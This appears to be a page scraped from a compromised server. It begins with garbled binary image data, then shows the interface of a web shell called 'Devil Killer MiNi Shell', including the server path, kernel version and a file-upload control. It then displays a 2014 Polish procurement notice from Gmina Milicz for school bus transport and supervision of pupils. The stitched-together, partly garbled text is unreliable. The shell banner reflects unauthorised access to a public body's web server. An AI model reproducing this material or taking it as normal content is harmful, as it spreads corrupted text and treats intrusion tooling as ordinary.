JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140728/250756-N-2014.html

<p class="kh_header"><b>Milicz: Dowozy i opieka nad uczniami dowożonymi do publicznych przedszkoli, szkół podstawowych i gimnazjalnych prowadzonych przez Gminę Milicz w okresie 
od 1 września 2014 roku do 30 czerwca 2015 roku</b><br>
<b>Numer ogłoszenia: 250756 - 2014; data zamieszczenia: 28.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Milicz , ul. Trzebnicka 2, 56-300 Milicz, woj. dolnośląskie, tel. 71 3804317, faks 71 3841119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy i opieka nad uczniami dowożonymi do publicznych przedszkoli, szkół podstawowych i gimnazjalnych prowadzonych przez Gminę Milicz w okresie 
od 1 września 2014 roku do 30 czerwca 2015 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nabycie biletów miesięcznych przez Gminę Milicz dla dzieci na zasadach określonych w art. 5 ust. 1 i art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (Dz. U. z 2012 r. poz. 1138 z późn. zm.) oraz dowóz i opieka nad uczniami dowożonymi do publicznych przedszkoli, szkół podstawowych i gimnazjalnych prowadzonych przez Gminę Milicz w okresie od 1 września 2014 r. do 30 czerwca 2015 roku.
Do obowiązków Wykonawcy należy: 
a)realizowanie dowozów uczniów w dniach nauki szkolnej, na trasach stanowiących odpowiednio:
Część I - dowóz i 4 odwozy uczniów Gimnazjum w Miliczu, Szkoły Podstawowej Nr 2 i Szkoły Muzycznej I Stopnia w Miliczu oraz wychowanków Przedszkola Samorządowego w Miliczu z miejscowości: Czatkowice, Duchowo, Dyminy, Godnowa, Gogołowice, Grabownica, Karminek, Kaszowo, Kąty, Koruszka, Kozuby, Lasowice, Marchwice, Milicz, Miłochowice, Niesułowice, Nowe Grodzisko, Nowy Zamek, Piękocin, Pogórzyno, Pomorska, Postolin, Ruda Milicka, Sławoszowice, Stawczyk, Stawiec, Stawno, Średzina, Świętoszyn, Tomaszków, Wałkowa, Wszewilki. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 486. Zapewnienie dowozu i odwozu grupy do 30 wychowanków Przedszkola Samorządowego wraz z nauczycielami na zajęcia na Krytej pływalni Milicka Fala z siedzibą w Miliczu przy ul. Kombatantów 3 dwa razy z tygodniu w godzinach pomiędzy 8:00 a 9:55. 

Część II - dowóz i 3 odwozy uczniów Gimnazjum im. Jana Pawła II w Sułowie i Szkoły Podstawowej im. Juliusza Słowackiego w Sułowie zamieszkałych w miejscowościach: Ruda Sułowska, Grabówka, Olsza, Baranowice, Wilkowo, Niezgoda, Łąki. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 82;

Część III - dowóz i 3 odwozy uczniów Gimnazjum im. Jana Pawła II w Sułowie i Szkoły Podstawowej im. Juliusza Słowackiego w Sułowie zamieszkałych w miejscowościach: Miłosławice, Sułów (Dom Dziecka), Gruszeczka, Pracze. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 65;

Część IV - dowóz i 3 odwozy uczniów Gimnazjum im. Jana Pawła II w Sułowie, Szkoły Podstawowej im. Juliusza Słowackiego w Sułowie, Szkoły Podstawowej w Dunkowej zamieszkałych w miejscowościach: Sulimierz, Słączno, Dunkowa, Węgrzynów, Piotrkosice, Piotrkosice-osada, Piękocinek, Brzezina Sułowska-osada, Brzezina Sułowska-gajówka. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 147.
Część V - dowóz i 2 odwozy uczniów Gimnazjum we Wróblińcu oraz Szkoły Podstawowej we Wziąchowie Wielkim z miejscowości: Bartniki, Bracław, Chałupy, Gądkowice, Gądkowice-leśniczówka, Gołkowo, Górka, Jankowa, Joachimówka, Kolęda, Latkowa, Latkowa-gajówka, Lelików, Młodzianów, Ostrowąsy, Potasznia, Tworzymirki, Tworzymirki Górne, Wielgie Milickie, Wodników Górny, Wrocławice, Wróbliniec, Wziąchowo Małe, Wziąchowo Wielkie. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 285; 
Część VI - dowóz i 2 odwozy uczniów Szkoły Podstawowej w Nowym Zamku z miejscowości: Dzierzgów, Godnowa, Jankowa, Średzina, Tworzymirki, Tworzymirki Górne. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 65;
Część VII - dowóz i 2 odwozy uczniów Szkoły Podstawowej w Czatkowicach z miejscowości: Borzynowo, Czatkowice, ul. Wierzchowicka, Grabownica, Henrykowice, Młodzianów, Niesułowice. Szacowana liczba uczniów, dla których Zamawiający wykupi bilety miesięczne w okresie realizacji zamówienia: 29.
b)ustalenie, w uzgodnieniu z Zamawiającym i dyrektorami szkół, do których realizowany jest dowóz, różnego rozkładu jazdy autobusów w okresie pierwszego półrocza roku szkolnego i drugiego półrocza roku szkolnego oraz na dzień rozpoczęcia i zakończenia roku szkolnego,
c)zapewnienie w czasie przewozu opieki nad przewożonymi uczniom, sprawowanej przez osobę posiadającą kwalifikacje pedagogiczne oraz ukończony kurs w zakresie udzielania pierwszej pomocy, inną niż kierowca. Przez kwalifikacje pedagogiczne należy rozumieć posiadanie kwalifikacji niezbędnych do zajmowania stanowiska nauczyciela w rozumieniu przypisów art. 9 ustawy z dnia 26 stycznia 1982 r. Karta Nauczyciela (Dz. U. z 2014 r. poz. 191) lub ukończenie kursu pedagogicznego albo ukończenie kursu kierowników wycieczek.
d)umożliwienia bezpiecznego wsiadania i wysiadania z pojazdu na przystankach wskazanych przez Zamawiającego, 
e)zapewnienie ogrzewania w pojeździe oraz zapewnienie temperatury min. 16 stopni Celsjusza w pojeździe podczas przewozu w okresie od 1 listopada 2014 r. do 31 marca 2015 r., 
f)zapewnienie przewożonym uczniom, którzy posiadają zakupione bilety, miejsc siedzących. Wykonawca ma obowiązek zapewnić pierwszeństwo przewozu uczniom korzystającym z biletów miesięcznych ulgowych,
g)zapewnienie zastępstwa w razie braku możliwości osobistego wykonywania przedmiotu zamówienia, 
h)przygotowanie, w uzgodnieniu z Zamawiającym, szczegółowego wykazu tras dla poszczególnych części przedmiotowego zamówienia. 
Przedmiotowe usługi muszą być wykonywane autobusami dopuszczonymi do ruchu tj. z ważnymi badaniami technicznymi oraz ważnymi polisami ubezpieczenia komunikacyjnego OC. Przedmiotowe zamówienie dotyczy zapewnienia przewozów na liniach regularnych dla szacunkowej liczby 1180 uczniów. Wykonawca zapozna się ze stanem dróg, na których realizowane będą dowozy oraz ustali przebieg tras przejazdu, a w porozumieniu z dyrektorami szkół - szczegółowy rozkład jazdy, w terminie do 20 sierpnia 2014 roku.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, do wartości 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium na poszczególne części przedmiotu zamówienia:
- na Część I w wysokości: 2.000,00 zł, słownie: dwa tysiące złotych 00/100;
 - na Część II w wysokości: 500,00 zł, słownie: pięćset złotych 00/100;
- na Część III w wysokości: 500,00 zł, słownie: pięćset złotych 00/100;
- na Część IV w wysokości: 1.000,00 zł, słownie: jeden tysiąc złotych 00/100;
- na Część V w wysokości: 2.000,00 zł, słownie: dwa tysiące złotych 00/100;
- na Część VI w wysokości: Zamawiający nie wymaga wniesienia wadium;
- na Część VII w wysokości: Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż posiada dokument potwierdzający posiadanie uprawnień do prowadzenia działalności w zakresie krajowego transportu osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie) wykonał lub wykonuje co najmniej jedną usługę w zakresie przewozu osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż dysponuje niezbędną do wykonania części lub całości zamówienia, ilością w pełni sprawnych środków transportowych wraz z kierowcami i opiekunami dzieci, którzy posiadają odpowiednie uprawnienia do prowadzenia pojazdów, którymi świadczony będzie dowóz. W celu realizacji poszczególnych części zamówienia wystarczające jest dysponowanie: 
- dla Części I: 4 autobusami (każdy po min. 39 miejsc siedzących), 
- dla Części II: co najmniej 1 autobus (po min. 39 miejsc siedzących), 
- dla Części III: co najmniej 1 autobus (po min. 39 miejsc siedzących),
- dla Części IV: co najmniej 2 autobusami (po min. 39 miejsc siedzących),
- dla Części V: co najmniej 2 autobusami (po min. 39 miejsc siedzących), 
- dla Części VI: co najmniej 1 autobus (po min. 39 miejsc siedzących),
- dla Części VII: co najmniej 1 autobus (po min. 25 miejsc siedzących).
W przypadku złożenia oferty na więcej niż jedną część zamówienia wykonawca musi dysponować liczbą autobusów stanowiącą sumę autobusów wymaganych na każdą z części, których oferta dotyczy (np. co najmniej 12 autobusami, gdy wykonawca składa ofertę na wszystkie części). Zamawiający wymaga ponadto dysponowania co najmniej jednym autobusem zastępczym gotowym do realizacji zamówienia(niezależnie od tego czy Wykonawca składa ofertę na jedną, więcej niż jedną czy wszystkie Części I-VII przedmiotowej usługi).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż dysponuje niezbędną do wykonania części lub całości zamówienia, ilością w pełni sprawnych środków transportowych wraz z kierowcami i opiekunami dzieci, którzy posiadają odpowiednie uprawnienia do prowadzenia pojazdów, którymi świadczony będzie dowóz. W celu realizacji poszczególnych części zamówienia wystarczające jest dysponowanie: 
- dla Części I: 4 autobusami (każdy po min. 39 miejsc siedzących), 
- dla Części II: co najmniej 1 autobus (po min. 39 miejsc siedzących), 
- dla Części III: co najmniej 1 autobus (po min. 39 miejsc siedzących),
- dla Części IV: co najmniej 2 autobusami (po min. 39 miejsc siedzących),
- dla Części V: co najmniej 2 autobusami (po min. 39 miejsc siedzących), 
- dla Części VI: co najmniej 1 autobus (po min. 39 miejsc siedzących),
- dla Części VII: co najmniej 1 autobus (po min. 25 miejsc siedzących).
W przypadku złożenia oferty na więcej niż jedną część zamówienia wykonawca musi dysponować liczbą autobusów stanowiącą sumę autobusów wymaganych na każdą z części, których oferta dotyczy (np. co najmniej 12 autobusami, gdy wykonawca składa ofertę na wszystkie części). Zamawiający wymaga ponadto dysponowania co najmniej jednym autobusem zastępczym gotowym do realizacji zamówienia(niezależnie od tego czy Wykonawca składa ofertę na jedną, więcej niż jedną czy wszystkie Części I-VII przedmiotowej usługi).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Wraz z ofertą przekazywane są następujące dokumenty lub załączniki:   
1.Formularz ofertowy - wg wzoru stanowiącego Załącznik Nr 1 do SIWZ. 
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 Pzp, zgodnie ze wzorem oświadczenia, stanowiącym Załączniki Nr 2 do SIWZ.
3. W przypadku gdy podmiot należy do grupy kapitałowej składa wraz z ofertą listę podmiotów należących do tej samej grupy kapitałowej - Załącznik Nr 11 do SIWZ

II. Oferty wspólne. 
1.W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa.
2. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za realizację zamówienia.
3. W przypadku składania oferty wspólnej:
a) oferta winna zawierać dokumenty, o których mowa w punkcie III.4.2 niniejszego ogłoszenia, dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie;
b) najpóźniej przed zawarciem umowy w sprawie zamówienia publicznego wykonawcy, których wspólna oferta została wybrana przez zamawiającego, zobowiązani się przedłożyć umowę regulującą współpracę podmiotów występujących wspólnie (umowę konsorcjum / umowę spółki cywilnej), w której wykonawcy określą między innymi strony umowy ze wskazaniem lidera i celu, w jakim umowa została zawarta, prawa i obowiązki stron, zakres usług do wy-konania przez każdego uczestnika konsorcjum (wspólnika spółki cywilnej, partnera) oraz czas trwania umowy. Czas trwania umowy regulującej współpracę podmiotów występujących wspólnie powinien obejmować co najmniej okres obowiązywania umowy na wykonanie zamówienia, określony w punkcie 7 SIWZ.
c) ustanowiony pełnomocnik winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego partnera, na rzecz każdego z partnerów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania istotnych zmian do umowy na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, w następujących sytuacjach:
a)zmiany w organizacji szkół objętych niniejszym zamówieniem publicznym, poprzez dostosowanie realizacji umowy do zmienionej organizacji szkół,
b) wystąpienia siły wyższej rozumianej jako okoliczności, które zaistniały niezależnie od Wykonawcy, bądź Zamawiającego, a których Strony przy dołożeniu należytej staranności nie mogły w dniu podpisywania Umowy przewidzieć ani im zapobiec (przykładowe okoliczności):
-katastrofy naturalne,
-nadzwyczajne zjawiska pogodowe np. znaczne opady atmosferyczne,
-zamieszki społeczne,
-sprzeczne z przepisami działania osób trzecich itp.,
poprzez dostosowanie realizacji umowy do okoliczności zaistniałych na skutek wystąpienia siły wyższej;
c)w przypadku zwiększenia zapotrzebowania na liczbę odwozów - poprzez zwiększenie liczby odwozów z jednoczesnym zwiększeniem ceny za bilet miesięczny określony w § 4 umowy na przedmiotowe zadanie,
d) w przypadku zmiany stawki podatku od towarów i usług (VAT) na usługi określone w przedmiocie zamówienia czego następstwem będzie zmiana wynagrodzenia umownego - poprzez dostosowanie przewidzianej umową stawki podatku VAT do stawki wynikającej ze zmienionych przepisów prawa,
e) zmiany w zakresie zakresu zadania powierzonego podwykonawcom lub podmiotu podwykonawcy.
W tych przypadkach strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz.pl lub Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 58, w cenie 15,00 zł na wniosek oferenta zgodnie z art. 42 ust. 2 Pzp.</p>
